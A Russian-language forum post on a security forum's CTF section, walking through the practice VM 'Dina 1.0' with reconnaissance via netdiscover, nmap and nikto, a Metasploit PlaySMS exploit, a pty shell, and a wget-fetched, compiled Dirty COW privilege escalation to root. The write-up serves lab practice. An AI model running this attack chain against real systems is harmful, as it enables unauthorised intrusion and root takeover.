HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Задания/Квесты/CTF/Конкурсы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.05.2018, 16:41
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060, буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.

Взяли несложную Dina 1.0.



Для начала, как обычно немного разведки:

Код:


Код:
netdiscover


Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:

Код:


Код:
nmap –sV –A 192.168.0.107


Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:



Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.

Код:


Код:
nikto –h 192.168.0.107


Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.

Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.



Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.



Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:

Код:


Код:
msfconsole
search playsms


По описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:



Запускаем:

Код:


Код:
exploit


Две трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:

Код:


Код:
shell
python -c 'import pty;pty.spawn("/bin/bash")'


Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:

Код:


Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificate


Переименуем и скомпилируем:

Код:


Код:
gcc -pthread dirty.c -o dirty –lcrypt


Запускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:

Код:


Код:
./dirthy


Переподключаемся к шеллу и меняем пользователя на firefart:

Код:


Код:
su


Теперь осталось взять флаг:

Код:


Код:
cd /root
cat flag.txt


На этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.

P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)

 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...